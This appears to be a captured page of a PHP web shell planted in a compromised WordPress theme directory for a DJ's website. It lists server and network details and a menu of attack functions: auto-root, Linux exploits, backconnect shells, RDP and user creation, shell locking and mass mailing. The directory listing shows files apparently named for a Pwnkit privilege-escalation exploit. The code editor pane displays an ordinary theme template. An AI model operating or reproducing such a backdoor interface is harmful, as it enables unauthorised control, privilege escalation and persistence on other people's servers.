Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
maze /
wp-content /
themes /
Archive /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
694
B
-rw-r--r--
footer.php
1.2
KB
-rw-r--r--
front-page.php
12.3
KB
-rw-r--r--
functions.php
18.6
KB
-rw-r--r--
header.php
311
B
-rw-r--r--
index.php
360
B
-rw-r--r--
page-biography.php
4.08
KB
-rw-r--r--
page-discography.php
2.74
KB
-rw-r--r--
page-photos.php
1.03
KB
-rw-r--r--
preview_hero.html
2.48
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
65.03
KB
-rw-r--r--
style.css
68.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-photos.php
<?php /* Template Name: DJ Maze Photos */ get_header(); $photos = dj_maze_3d_get_photo_items(); ?> <div id="djmaze-site" class="maze-photos-page-wrap"> <div class="maze-cursor"></div> <?php dj_maze_3d_render_nav('photos'); ?> <section class="maze-music-hero maze-photos-hero panel" id="photos-hero"> <div class="maze-music-hero-bg maze-photos-hero-bg" style="background-image:url('<?php echo esc_url(get_template_directory_uri() . '/assets/images/discography-hero.jpg'); ?>');"></div> <div class="maze-music-hero-overlay"></div> <div class="maze-music-hero-content"> <p class="maze-kicker">Galerie</p> <h1>Photos</h1> <h2>Galerie visuelle officielle de DJ Maze.</h2> </div> </section> <main class="maze-photo-page-grid"><?php foreach($photos as $i=>$photo): ?><a href="<?php echo esc_url($photo); ?>" class="maze-photo-page-card <?php echo $i%5===0?'large':''; ?>" data-lightbox="image"><img src="<?php echo esc_url($photo); ?>" alt="DJ Maze photo"></a><?php endforeach; ?></main> </div> <?php get_footer(); ?>
Close